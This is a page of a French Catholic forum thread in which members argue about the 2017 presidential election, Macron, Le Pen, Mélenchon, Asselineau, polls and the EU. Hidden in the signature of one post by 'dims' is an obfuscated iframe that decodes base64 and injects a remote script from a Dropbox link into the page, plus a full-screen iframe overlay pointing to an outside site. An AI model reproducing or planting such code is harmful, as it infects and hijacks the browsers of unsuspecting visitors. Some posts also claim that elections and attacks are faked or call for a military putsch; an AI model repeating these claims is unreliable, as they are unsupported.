DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.
DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE

Théologie Spirituelle Catholique
Pour déposer une intention de prière : Agapé
ATTENTION : Les publicités ci-dessous sont indépendantes de notre volonté !
 
AccueilAccueil  PortailPortail  FAQFAQ  RechercherRechercher  Dernières imagesDernières images  S'enregistrerS'enregistrer  Connexion  
Le deal à ne pas rater :
Funko POP! Jumbo One Piece Kaido Dragon Form : où l’acheter ?
Voir le deal
Le Deal du moment :
Funko POP! Jumbo One Piece Kaido Dragon Form : ...
Voir le deal

 

 Politique française et élections présidentielles

Aller en bas 
+15
-ysov-
Oculus
humanlife
Pascal
boulo
Arnaud Dumouch
Pignon
dims
Onan Peuplu
adamev
joker911
Ray
Waddle
Nathan2
Hillel31415
19 participants
Aller à la page : Précédent  1 ... 8 ... 13, 14, 15 ... 20  Suivant
AuteurMessage
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:27

Le Front Républicain qu'on nous présente ressemble à ça ? :mdr:

Quant à Richelieu, écoutez à 4min ce qu'il déclara

Revenir en haut Aller en bas
Ray




Messages : 7250
Inscription : 13/11/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:36

Sainte Lucia a écrit:
Spoiler:

Merci Sainte Lucia. salut
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:43

De rien
Il y en a beaucoup à dire

Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:45

Je ne vois aucune imposture républicaine... Si les Français souhaitaient un autre régime que le régime républicain ils en changeraient. Or ce n'est pas le cas.
(Je dis ceci sans mépris pour le régime royaliste)
Revenir en haut Aller en bas
joker911




Messages : 3032
Inscription : 22/11/2009

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:50

Macron président :mdr:
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 21:56

Et moi je ne vois aucune imposture raciale de vouloir se montrer francophile (et non xénophobe).
Au lieu de demander aux gens qui n'ont pas assez de ressources pour s'occuper d'eux, que les députés ou membres du cac accueillent même pour un jour, chez eux, ces immigrés au lieu de laisser des français de longues date dans le froid et la faim.

On oublie le passé colonisateur esclavagiste républicaine qui d'ailleurs le France deviendra le vassal des USA dans la traite des noirs.
Sais-tu que Bonaparte avait fait mettre un code civil pour les noirs ? ...à l'immigration de masse comme main d'oeuvre à faible coût depuis des décennies dans la Vème République....en oubliant les propos imbuvables et racistes des députés de la révolutions de 1789....et de Luc Ferry

Le Front Républicain devrait revoir son passé au lieu de donner de leçons aux autres.....l'odeur comme disait Chirac
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:03

Je ne regarde pas l'Histoire de la République, je regarde la République de maintenant. Or, la République de maintenant ne prône ni le racisme, ni l'eslavage, ni la xénophobie.
Revenir en haut Aller en bas
Hillel31415

Hillel31415


Masculin Messages : 4659
Inscription : 08/04/2013

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:05

dims a écrit:
Spoiler:
Je ne dis pas le contraire. Je dis qu'entre du hollandisme 5 ans de plus ou un régime inexpérimenté fascisant, je choisis le moins pire des deux fléaux.
Si ça avait été Fillon-Lepen j'aurai voté blanc.
Après, je me trompe peut être. Peut être marine Lepen serait une présidente géniale. Mais j'avoue, quand je vois Trump aux states, j'ai des doutes.

_________________
L'unité est une bénédiction puissante, mais elle est inutile si elle est acquise au prix de la vérité.
La bible est encore vivante: elle me parle. Elle a des pieds: elle me court après. Elle a des mains: elle s'est saisie de moi.

Luc 11:27 Tandis que Jésus parlait ainsi, une femme, élevant la voix du milieu de la foule, lui dit: Heureux le sein qui t’a porté ! heureuses les mamelles qui t’ont allaité ! Et il répondit : Heureux plutôt ceux qui écoutent la parole de Dieu, et qui la gardent !
Qui est Marie pour les protestants ?


Dernière édition par Hillel31415 le Dim 23 Avr - 22:07, édité 1 fois
Revenir en haut Aller en bas
https://urlz.fr/9xXE
aristote

aristote


Masculin Messages : 771
Inscription : 30/03/2012

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:05

La politique à la française, mais je précise, dans le contexte actuel. J'ai été consulter le programme de Macron (je souligne, je n'ai lu que le programme disponible sur son site officiel). Bon, on peut dire que soit je ne comprends absolument rien de rien à ses propositions, soit du peu que j'ai compris il s'agit d'un programme malheureusement flou et totalement centré sur les performances économiques. Peut-on calculer (si tant est qu'on peut le "calculer") le bonheur des Français sur des courbes géométriques ?

Par ailleurs, les questions sociétales n'apparaissent étonnamment pas dans le programme en ligne. Il est question, bien entendu, du rapport à l'UE (une servilité qui me laisse d'ailleurs sans voix). Avons-nous donc une vocation ancillaire à l'égard des instances supranationales européennes ? Je vais bien sûr réfléchir, relire les programmes, avec attention.

Mais ces présidentielles me laissent un goût amer...
Revenir en haut Aller en bas
joker911




Messages : 3032
Inscription : 22/11/2009

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:09

Hillel31415 a écrit:
Spoiler:

De toute façon même si Macron gagne la majorité au gouvernement vas être anti-Eu ( Lepen+Melenchon).
Revenir en haut Aller en bas
Hillel31415

Hillel31415


Masculin Messages : 4659
Inscription : 08/04/2013

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:13

La victoire de Macron est assurée, ne vous faites pas d'illusion. Si ça avait été Lepen-Fillon, peut être qu'il y aurait eu un doute. Dans ce cas de figure non.


Déclaration de Melenchon pour ceux qui ça interessent...


_________________
L'unité est une bénédiction puissante, mais elle est inutile si elle est acquise au prix de la vérité.
La bible est encore vivante: elle me parle. Elle a des pieds: elle me court après. Elle a des mains: elle s'est saisie de moi.

Luc 11:27 Tandis que Jésus parlait ainsi, une femme, élevant la voix du milieu de la foule, lui dit: Heureux le sein qui t’a porté ! heureuses les mamelles qui t’ont allaité ! Et il répondit : Heureux plutôt ceux qui écoutent la parole de Dieu, et qui la gardent !
Qui est Marie pour les protestants ?
Revenir en haut Aller en bas
https://urlz.fr/9xXE
dims

dims


Masculin Messages : 7204
Inscription : 27/01/2009

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:15

Oui à la limite on peut espérer Macron sans majorité.
Mais on connaît le 49.3 !
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:21

entre un franc-macron libéraliste technocratique européiste
et franc-maçon nationaliste

que voter aussi ?
Revenir en haut Aller en bas
Feld

Feld


Masculin Messages : 103
Inscription : 31/12/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:26

Arnaud Dumouch a écrit:
Rappel : Relativiser. Ce n'est que de la politique. Cool


Arnaud,

Vous en avez de bonnes ! Ce résultat est une catastrophe. Dans deux semaines, selon toute vraisemblance, le candidat de l'oligarchie sera Président de la république française. L'homme à la fois de la finance mondialisée conquérante et de l'extrême-gauche sociétale.

En ce moment, la classe politique dans sa quasi-totalité, en appelant à voter pour EM, est en train de faire l'étalage de sa veulerie, de sa petitesse, de son indifférence au sort de la patrie.

A gerber ! A pleurer ! :colere: :colere: :colere: :colere: :colere:
Revenir en haut Aller en bas
Arnaud Dumouch

Arnaud Dumouch


Masculin Messages : 93473
Inscription : 19/05/2005

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:29

Mais non. C'est un centriste et l'extrême gauche à fait 1% avec Poutou et 18% avec Mélenchon "parce qu'il parlait bien".

Par contre, il risque de continuer dans les lois sociétales (GPA etc.)

_________________
Arnaud
Revenir en haut Aller en bas
http://eschatologie.free.fr
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:30

Feld a écrit:
Spoiler:
thumleft
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:45

Arnaud Dumouch a écrit:
Mais non. C'est un ......
type qui a les médias, raconte que bêtises à chacune de ses phrases, la plupart du temps se contredit, des fois sans aucuns sens, et d'accord avec tout le monde

et l'élite de la médiocratie


bref, plus tu es médiocre, plus tu es plébiscité


le type personne ne le connaissait il y a deux semaines, et hop président




à rien y comprendre ...c'est une blague Macron clown2
Revenir en haut Aller en bas
Ray




Messages : 7250
Inscription : 13/11/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:47

dedel a écrit:
Spoiler:

Il est à l'image de ce pays à la dérive.
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:55

Aldous59 a écrit:
Je ne regarde pas l'Histoire de la République, je regarde la République de maintenant. Or, la République de maintenant ne prône ni le racisme, ni l'eslavage, ni la xénophobie.
on peut en dire autant du front républicain

on fait quoi du vote de 2005 qui a dit NON ?

oui donc on est 2017, pas grave

sauf que De Gaulle n'a jamais voulu de cette Europe fédéraliste
il a lui-même dit que c'est une chimère, une utopie


l'euro va exploser pour de tas de raisons
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:56

Asselineau face à Macron
toute la classe politicienne traditionnelle aurait la trouille
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 22:56

dedel a écrit:
Spoiler:

On ne peut répondre à un coup d'État (2005/2008), par une élection. Seul un putsch militaire serait, peut-être, en mesure de sauver la France...
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:04

De Gaulle n'a jamais voulu de cette Europe qu'on a nous vendue par le mensonge

https://www.upr.fr/dossiers-de-fond/de-gaulle-et-l-europe
Revenir en haut Aller en bas
Hillel31415

Hillel31415


Masculin Messages : 4659
Inscription : 08/04/2013

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:18

Arnaud Dumouch a écrit:
Mais non. C'est un centriste et l'extrême gauche à fait 1% avec Poutou et 18% avec Mélenchon "parce qu'il parlait bien".

Par contre, il risque de continuer dans les lois sociétales (GPA etc.)
Vous oubliez Hamon. qui n'avait pas de programme et a plus ou moins piqué celui de Melenchon, la charisme en moins.
Ca aurait fait gagner la gauche...

Macron va mixer le pire de la gauche (loi societal) au pire de la droite uberisation, deregulation des lois du travail

_________________
L'unité est une bénédiction puissante, mais elle est inutile si elle est acquise au prix de la vérité.
La bible est encore vivante: elle me parle. Elle a des pieds: elle me court après. Elle a des mains: elle s'est saisie de moi.

Luc 11:27 Tandis que Jésus parlait ainsi, une femme, élevant la voix du milieu de la foule, lui dit: Heureux le sein qui t’a porté ! heureuses les mamelles qui t’ont allaité ! Et il répondit : Heureux plutôt ceux qui écoutent la parole de Dieu, et qui la gardent !
Qui est Marie pour les protestants ?


Dernière édition par Hillel31415 le Dim 23 Avr - 23:23, édité 2 fois
Revenir en haut Aller en bas
https://urlz.fr/9xXE
Feld

Feld


Masculin Messages : 103
Inscription : 31/12/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:19

dedel a écrit:
De Gaulle n'a jamais voulu de cette Europe qu'on a nous vendue par le mensonge

https://www.upr.fr/dossiers-de-fond/de-gaulle-et-l-europe
`

Excellentes explications, sur le site de l'UPR.

0,90 % seulement des Français ont voté pour Asselineau. Désespérant....
Revenir en haut Aller en bas
Hillel31415

Hillel31415


Masculin Messages : 4659
Inscription : 08/04/2013

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:20

Moins que pour Jean Lassale ... :mdr:

_________________
L'unité est une bénédiction puissante, mais elle est inutile si elle est acquise au prix de la vérité.
La bible est encore vivante: elle me parle. Elle a des pieds: elle me court après. Elle a des mains: elle s'est saisie de moi.

Luc 11:27 Tandis que Jésus parlait ainsi, une femme, élevant la voix du milieu de la foule, lui dit: Heureux le sein qui t’a porté ! heureuses les mamelles qui t’ont allaité ! Et il répondit : Heureux plutôt ceux qui écoutent la parole de Dieu, et qui la gardent !
Qui est Marie pour les protestants ?
Revenir en haut Aller en bas
https://urlz.fr/9xXE
dims

dims


Masculin Messages : 7204
Inscription : 27/01/2009

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:22

Hillel31415 a écrit:
Spoiler:

Hamon était l'idiot utile pour bloquer Melenchon.

_________________
Il n'importe guère qu'un être soit croyant ou non: il est beaucoup plus important qu'il soit bon.<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
Feld

Feld


Masculin Messages : 103
Inscription : 31/12/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:23

Les deux dernières notes du P. Yannik Bonnet, sur son blog :

http://www.yannikbonnet.com/Comment-pourra-se-maintenir-le-renouveau-de-la-France-Pere-Yannik-Bonnet_a355.html

http://www.yannikbonnet.com/La-France-peut-elle-se-relever-de-son-cinquieme-naufrage-republicain-Pere-Y-Bonnet_a353.html

La France est tellement à la dérive que ça pourrait bien se terminer comme ça . Mais dans 10, 15, 20 ans ? Quand les Français se décideront-ils enfin à f...en l'air ce système politique mortifière ?
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:29

Arnaud Dumouch a écrit:
dims a écrit:
Les riches peuvent fuir mais ils seront quand même taxer.
L’impôt sur la nationalité française !
Ils renonceront à leur nationalité.
Tous les français riches ne sont pas cupides. Et s'ils le sont, bah on fait sans eux. Vaut mieux être pauvres, dignes et solidaires plutôt que de mendier.
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:32

Arnaud Dumouch a écrit:
dims a écrit:
Spoiler:

L'égalité donne la misère car elle inhibe l'envie d'en faire plus pour gagner plus.
Oui il était bizarre celui qui ordonnait à l'époque de lever une dime pour les pauvres, les orphelins et les veuves. Il aurait du ordonner d'alléger la dime pour les plus riches pour qu'ils puissent mieux investir dans le pays.
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:33

réflexion faite
je m'abstiendrai
j'avais voté le FN le 21 avril 2002 mais je ne voterai plus pour ce parti

Le Pen-Macron
c'est de tomber de Charybde en Scylla

si la Bible dit que cela va péter dans les temps de la fin, cela va péter
si des gens veulent le veau d'or, qu'ils aillent se recueillir auprès du veau d'or
tout le monde ne sera pas sauvé de toute façon
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:36

Gabriel a écrit:
Eh voila les média ont réussi à vendre leur produit Macron, il reste à soutenir MLP pour ne pas poursuivre 5 ans de Hollandisme.

Heureusement Mélenchon est éliminé.
Lol
Gabriel a passé ces derniers jours à nous bombarder de message anti Macron et maintenant il appelle à soutenir celle dont le parti est infesté de néo nazis :Donc

Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:40

Hillel31415 a écrit:
Moins que pour Jean Lassale ... :mdr:
Oui mais Melenchon a fait un super score. Ça nous fait pourtant une belle jambe.
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:41

dedel a écrit:
Spoiler:

Idem. Je ne vote pas au second tour.
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:43

L'enseignement qu'on peut en tirer c'est que les sondages sont fiables. Même s'ils sont anti démocratiques.

Certains parlaient ici des sondages secrets des RG, de sondages de ceux qui auraient prédit le Brexit et qui voyaient Fillon qualifiés, des sondages sur le net (pour les pro Melenchon et Asselineau), etc...

La réalité c'est que c'est fiable.
Revenir en haut Aller en bas
Hillel31415

Hillel31415


Masculin Messages : 4659
Inscription : 08/04/2013

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:49

les pro melenchon n'ont jamais invoqués les sondages sur le net comme étant représentatifs des elections... Merci de ne pas me mêlez aux ahuris qui voyaient Asselineau au second tour à cause des sondages internets et des parieurs anglais...
Melenchon était dans la marge d'erreur (des vrais sondages) donc tous les espoirs étaient permis

Et en ce qui concerne le score de Melenchon, ça change tout quand même, la gauche va se recomposer autour du Front de Gauche, ce qui reste du Ps doit se ralier à Melenchon ou creuver tout seul.

Chez LR il va y avoir du sport, Fillon va se faire assassiner par ceux qui restaient et une partie va se barrer chez Macron.
Macron va gouverner avec els gens de "bonnes volonté"s cad les creuvards LR et PS qui vont quitter le navire.

_________________
L'unité est une bénédiction puissante, mais elle est inutile si elle est acquise au prix de la vérité.
La bible est encore vivante: elle me parle. Elle a des pieds: elle me court après. Elle a des mains: elle s'est saisie de moi.

Luc 11:27 Tandis que Jésus parlait ainsi, une femme, élevant la voix du milieu de la foule, lui dit: Heureux le sein qui t’a porté ! heureuses les mamelles qui t’ont allaité ! Et il répondit : Heureux plutôt ceux qui écoutent la parole de Dieu, et qui la gardent !
Qui est Marie pour les protestants ?
Revenir en haut Aller en bas
https://urlz.fr/9xXE
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:55

ils me font rigoler ces gens qui votent Macron en expliquant que candidat doit avoir conscience que c'est pas son projet pour lequel ils votent
non mais redescendez de votre nuage
il faut assumer son vote
quand on vote, il faut assumer le projet de la personne pour lequel on vote
c'est quoi cette farce
c'est pas un jeu la politique. et qu'ils stoppent leur comportement d'enfants gâtés
le vainqueur, c'est le vainqueur....il faut assumer que c'est le peuple qui attribue
les perdants ont perdu et point barre
n'importe quoi
il faut savoir quitter la scène humblement et accepter le suffrage ....quand on est un minium démocrate
Revenir en haut Aller en bas
Onan Peuplu

Onan Peuplu


Masculin Messages : 7851
Inscription : 31/05/2016

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:59

Waddle a écrit:
Spoiler:

Mais n'importe quoi, il leur suffit d'ajuster plus ou moins les sondages au résultat attendu ..Pourquoi tu crois que tout est électronique et non-vérifiable ?

sûrement pas pour économiser le papier ! :beret:
Chez nous le papier ils en font des collectes sélectives, on croit que ça part au recyclage mais en réalité ça sert à allumer les incinérateurs ! carton rouge :bisou: Laughing


TOUT EST FAUX  et bidonné
dans ce système pour troufions.....les "attentats", l'écologie, et évidemment les élections aussi Mr.Red


Dernière édition par Onan Peuplu le Lun 24 Avr - 0:03, édité 1 fois
Revenir en haut Aller en bas
Eleison




Masculin Messages : 540
Inscription : 08/12/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyDim 23 Avr - 23:59

Hillel31415 a écrit:
J'attend les fan boys d'Asselineau moi... 1% Mouarf, je suis mort de rire.
Je suppose que c'est un complot de la CIA et qu'on a bourré les urnes contre leur candidat... Pouffer de rire

Mort de rire
(merci quand-même ) ? Je crains qu'il ne faille bientôt devoir en pleurer. En attendant, il faut effectivement se poser des questions sur la redoutable efficacité du conditionnement médiatique. Asselineau, objet presqu'exclusivement d'omerta ou de bashing, méritait au moins ses 5%, vu l'énormité du travail accompli depuis des mois dans les conférences, youtube, site internet, réseaux sociaux etc... La stagnation totale est une anomalie flagrante. Aussi anormale est la victoire de Macron, fruit de deux primaires providentiellement ratées et d'une émergence miraculeuse de sa candidature "centriste". Bien joué de la part des mass media et des capitaux tombés du ciel. Mais comment Trump a-t-il fait pour passer outre ?

Reste à voir comment réagiront les futurs parlementaires soi-disant eurosceptiques quand l'austérité européenne frappera la France inévitablement. Car beaucoup savent désormais - grâce à Asselineau - que les politiques économiques et sociales sont dictées par Bruxelles. Les masquent tomberont alors et le peuple n'aura plus qu'à pleurer sur ses choix inspirés.
Revenir en haut Aller en bas
Feld

Feld


Masculin Messages : 103
Inscription : 31/12/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:00

Excellent papier de Roland Hureaux :

http://roland.hureaux.over-blog.com/2017/04/l-election-de-macron-sonnerait-le-glas-de-la-democratie.html

Très Sainte Vierge Marie, sauve la France !

Car avec ce type, ce sera la fin !

Mais peut-on empêcher une nation de se suicider ?  J'ai envie de pleurer, de hurler !!!!!!!!
Revenir en haut Aller en bas
Pignon




Masculin Messages : 19590
Inscription : 18/01/2016

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:02

dedel a écrit:
je voterai FN


Bien!!
J'espère que vous n'allez pas changer d'avis!

_________________
Si vis pacem, para bellum
Mon stage chez TSAHAL : ICI
Gnôsis le documentaire : ICI
À la recherche du Pyramidion perdu :  ICI
Le Delta lumineux des francs-maçons :  ICI
Symbolisme de la Pyramide :
ICI
Le Grand Sceau des États-Unis d'Amérique et la Pyramide:
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:03

Pignon a écrit:
dedel a écrit:
je voterai FN


Bien!!
J'espère que vous n'allez pas changer d'avis!

si !

un peu plus bas
Revenir en haut Aller en bas
-ysov-

-ysov-


Masculin Messages : 16517
Inscription : 03/07/2010

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:04

Feld a écrit:
Spoiler:

De toute manière votre philosophe de l'heure Michel Onfray parle de la fin de la civilisation occidentale. :beret:
Revenir en haut Aller en bas
Invité
Invité




Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:05

tu votes Macron, tu choisis le projet Macron à défaut de voir celui de l'adversaire
point barre

voter contre .....c'est du barbarisme et un non sens
cela n'a rien démocratique de plus de faire du déni ensuite à ne pas reconnaitre le suffrage du vainqueur


Revenir en haut Aller en bas
Ray




Messages : 7250
Inscription : 13/11/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:19

Waddle a écrit:
La réalité c'est que c'est fiable.

Fiables parce que pour une fois ils ne se sont pas vautrés ? Vous plaisantez j'espère ? :beret:
Vous avez déjà oublié le Brexit, Trump, Fillon à la primaire et j'en passe ?
Revenir en haut Aller en bas
Onan Peuplu

Onan Peuplu


Masculin Messages : 7851
Inscription : 31/05/2016

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:21

Eleison a écrit:
Asselineau, objet presqu'exclusivement d'omerta ou de bashing, méritait au moins ses 5%, vu l'énormité du travail accompli depuis des mois dans les conférences, youtube, site internet, réseaux sociaux etc... La stagnation totale est une anomalie flagrante.


En effet...

ça s'explique notamment par la censure partiale de la part de "France TV info",

la devise de FRANCE 2 : vous payez, on vous entube ! :mdr: Mr.Red 

Revenir en haut Aller en bas
Ray




Messages : 7250
Inscription : 13/11/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:21

-ysov- a écrit:
Spoiler:

De toute manière votre philosophe de l'heure Michel Onfray parle de la fin de la civilisation occidentale. :beret:
Oui, et ce n'est pas une élection qui y changera quoi que ce soit.
C'est un mouvement qui vient de plus loin.

- les temps difficiles créent des hommes forts
- les hommes forts créent des périodes de paix
- les périodes de paix créent des hommes faibles
- les hommes faibles créent des temps difficiles.
(nous savons tous où nous en sommes dans ce cycle.)


Dernière édition par Ray le Lun 24 Avr - 0:28, édité 2 fois
Revenir en haut Aller en bas
Ray




Messages : 7250
Inscription : 13/11/2011

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:23

Feld a écrit:
Spoiler:

Cela relève plus du meurtre que du suicide, mais j'ai grosso modo le même sentiment que vous.

(très bon papier sinon, oui)
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:37

Hillel31415 a écrit:
Spoiler:
Quand je parle des pros Melenchon je ne parle pas.forcément de vous et pas forcément de ce forum.  

De la même manière vous parlez des ahuris d'Asselineau sans vous demander si vous me mêlez à ça Smile
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:38

Onan Peuplu a écrit:
Spoiler:
Il y a très peu de machines électronique en France.  Vous dites donc n'importe quoi et c'est assez insupportable.
Revenir en haut Aller en bas
Waddle




Masculin Messages : 2355
Inscription : 18/08/2015

Politique française et élections présidentielles - Page 14 Empty
MessageSujet: Re: Politique française et élections présidentielles   Politique française et élections présidentielles - Page 14 EmptyLun 24 Avr - 0:41

Ray a écrit:
Spoiler:
J'ai déjà expliqué poiurquoi les sondages présidentiels sont plus fiables que les autres.

